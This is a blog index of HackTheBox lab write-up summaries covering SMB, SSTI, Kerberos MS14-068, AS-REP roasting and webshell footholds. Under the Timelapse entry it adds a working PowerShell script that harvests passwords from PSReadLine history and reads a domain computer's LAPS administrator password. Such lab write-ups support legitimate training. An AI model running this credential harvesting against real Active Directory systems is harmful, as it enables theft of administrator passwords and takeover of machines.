Category: Write-Ups
-
Timelapse – HackTheBox
Timelapse was a relatively easy ‘Easy’ machine that required exploiting a misconfigured SMB share, which led to a shell as a normal user where a service account password was discovered in PowerShell history. That account was configured to be allowed to read the LAPS password, which let us gain administrative access on the machine. Scanning From the…
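The last two steps of that chain, as an added example that is not code from the original write-up: checking which principals can read the LAPS attribute on a computer object, then reading it once you hold the right. It assumes the RSAT ActiveDirectory module is loaded (so the AD: drive exists), that the session runs as the account the write-up found, and uses the placeholder computer name DC01.

```powershell
# Added example (not from the original write-up). Assumes the RSAT ActiveDirectory
# module is available and that the current session runs as the account that was
# granted read access to the LAPS attribute. 'DC01' is a placeholder target name.

# 1. Where the write-up found the password: the PSReadLine history file of the
#    foothold user. The path is per-user; this greps the current user's copy.
$history = (Get-PSReadLineOption).HistorySavePath
if (Test-Path $history) {
    Get-Content $history | Select-String -Pattern 'password|passwd|cred|secure'
}

# 2. Find which principals hold rights on the LAPS attribute ms-Mcs-AdmPwd.
#    The attribute is marked confidential, so ordinary ReadProperty on the object
#    is not enough; what matters is an ACE whose ObjectType is the attribute's own
#    schemaIDGUID (or the all-zero "everything" GUID) granting read/extended rights.
$target   = 'DC01'   # placeholder
$computer = Get-ADComputer -Identity $target
$schemaNC = (Get-ADRootDSE).SchemaNamingContext
$rawGuid  = (Get-ADObject -SearchBase $schemaNC -LDAPFilter '(name=ms-Mcs-AdmPwd)' `
                -Properties schemaIDGUID).schemaIDGUID
$admPwdGuid = [guid]$rawGuid
$allGuid    = [guid]'00000000-0000-0000-0000-000000000000'

$acl = Get-Acl -Path ("AD:\" + $computer.DistinguishedName)
$acl.Access |
    Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($_.ObjectType -eq $admPwdGuid -or $_.ObjectType -eq $allGuid) -and
        ($_.ActiveDirectoryRights -match 'ExtendedRight|ReadProperty|GenericAll')
    } |
    Select-Object IdentityReference, ActiveDirectoryRights, ObjectType |
    Format-Table -AutoSize

# 3. With the right in hand, read the password and its expiry.
#    ms-Mcs-AdmPwdExpirationTime is a FILETIME stored as a large integer.
$laps = Get-ADComputer -Identity $target -Properties 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime'
[pscustomobject]@{
    Computer = $laps.Name
    Password = $laps.'ms-Mcs-AdmPwd'
    Expires  = [DateTime]::FromFileTime([int64]$laps.'ms-Mcs-AdmPwdExpirationTime')
}
```

The ACL filter in step 2 is the same check the LAPS management module performs with Find-AdmPwdExtendedRights; doing it by hand with Get-Acl means it works from any host with the AD module, which is usually what you have on a foothold. Expect step 3 to return an empty Password field when the account does not actually hold the right: the directory silently omits confidential attributes rather than erroring.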
-
Late – HackTheBox
Late was an easy machine that required enumerating a subdomain to discover a Flask application used to OCR images. The application was vulnerable to Server-Side Template Injection (SSTI), which allowed for remote code execution. This led to SSH access, where it was discovered that a script run by root was in a writeable location from…
-
Mantis – HackTheBox
Mantis was a hard machine that focused on good enumeration and discovering an older vulnerability in the way Kerberos authenticates regular users. We’ll first discover MSSQL credentials, access the MSSQL server, and extract a domain user’s credentials. From there we will find that the version of Windows Server is vulnerable to MS14-068, which allows for…
-
Curling – HackTheBox
Curling is an easy machine that required directory busting a web page to find a secret key to access a Joomla CMS admin panel. This allowed for code execution which led to our initial shell. From there we moved laterally by finding a hex dump, decoding it, and discovering a password. To achieve root access,…
-
Active Directory Takeover Pt II – User to Domain Persistence
In the last post, we discussed some specific enumeration methods for gaining entry into a machine in an Active Directory environment. Today, we’ll get a SYSTEM shell in a few ways. Note that this machine only gives a brief glimpse into what’s possible beyond the initial shell, and we’ll be dealing with many other interesting methods…
-
Bounty – HackTheBox
Scanning I started with my standard nmap scan. Only one port was open, which I verified by running a scan against all ports as well. Enumeration – HTTP Port 80 There’s just an image here of Merlin with nothing else. Scanning with gobuster found something interesting. Unfortunately, this directory wasn’t working. No vhosts on the box…
-
Forest – HackTheBox
Forest is a much-hyped retired “Easy” Windows machine that deals with a wide variety of common AD attack vectors, both for initial entry and privilege escalation. Initially, I was able to leverage RPC to dump usernames from the domain, then AS-REP roast a service account. This was used to gain entry into the system, where I…
-
Bashed – HackTheBox
Scanning I started as always with an nmap scan. Enumeration Just port 80 open so let’s check that out. The dev folder looks promising. Wow, a phpbash webshell. That’s handy. Foothold – Shell as www-data Awesome, I should be able to get a reverse shell from this. It took a bit of tinkering with payloads…
-
Mango – HackTheBox
Scanning Started with my typical nmap scan. Enumeration – Port 443 Port 80 returned a 403 Forbidden as seen in the scan, but 443 seemed worthwhile to check out. This search function just returned to itself. Gobuster revealed a subdirectory /analytics, and this also worked from the primary page. This was a collected table of…